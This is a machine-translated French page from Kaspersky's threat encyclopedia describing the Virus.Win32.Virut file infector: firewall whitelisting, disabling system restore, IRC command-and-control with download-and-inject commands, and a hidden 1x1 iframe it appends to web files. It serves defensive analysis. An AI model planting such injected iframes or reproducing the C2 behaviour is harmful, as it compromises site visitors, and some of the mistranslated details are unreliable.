CE SERVICE PEUT CONTENIR DES TRADUCTIONS GÉNÉRÉES PAR GOOGLE. GOOGLE DÉCLINE TOUTE GARANTIE, EXPLICITE OU IMPLICITE, Y COMPRIS LES GARANTIES D'EXACTITUDE, DE FIABILITÉ, AINSI QUE TOUTE GARANTIE IMPLICITE DE COMMERCIALISATION ET D'ADAPTATION À DES FINS PARTICULIÈRES ET À L'ABSENCE DE CONTREFAÇONS.

Le site internet de Kaspersky Lab a été traduit pour votre commodité en utilisant un logiciel de traduction générée par Google. Des efforts raisonnables ont été faits pour fournir une traduction exacte. Cependant, aucune traduction automatique n'est parfaite et l'objectif n'est pas de remplacer le travail des traducteurs. Le site internet de Kaspersky Lab fournit ces traductions comme un service pour ses utilisateurs, et elles ont été publiées "telles quelles". Aucune garantie, explicite ou implicite, n'est faite au sujet de l'exactitude, de fiabilité ou de conformité de ces traductions faites de l'anglais vers une autre langue. Certains contenus (images, vidéos, Flash, etc.) peuvent ne pas être traduits correctement à cause des limites du logiciel de traduction.

Virus.Win32.Virut

Date de la détection 10/23/2007
Classe Virus
Plateforme Win32
Description

Le virus ajoute le fichier exécutable du processus hôte à la liste de pare-feu Windows des applications approuvées.

Ensuite, il désactive la fonction "Restaurer les fichiers système".

Le virus tente de contacter les serveurs IRC suivants:




prox ***** ircgalaxy.pl



irc ***** ef.pl



Si une connexion est établie, le virus envoie les commandes suivantes au serveur:




NICK dewxxpyi



UTILISATEUR b



JOIN #. <Rnd1>, où rnd1 est un nombre aléatoire.



Ensuite, le virus passe en mode veille, prêt à recevoir des commandes du serveur IRC malveillant et à les exécuter.

Le virus est capable d'exécuter les commandes suivantes:

  • ! Get: téléchargez un code malveillant depuis Internet et injectez-le dans les processus exécutés sur l'ordinateur victime.
  • ! hosu: ouvre les URL spécifiées sur l'ordinateur victime.

Le virus analyse également le disque dur de l'ordinateur victime pour rechercher les fichiers avec les extensions suivantes:




HTM



PHP



ASPIC



Si trouvé, il ajoute la chaîne suivante:

<iframe src = "http: //****.pl/rc/" width = 1 hauteur = 1
style = "border: 0"> </ iframe>

Lien vers l'original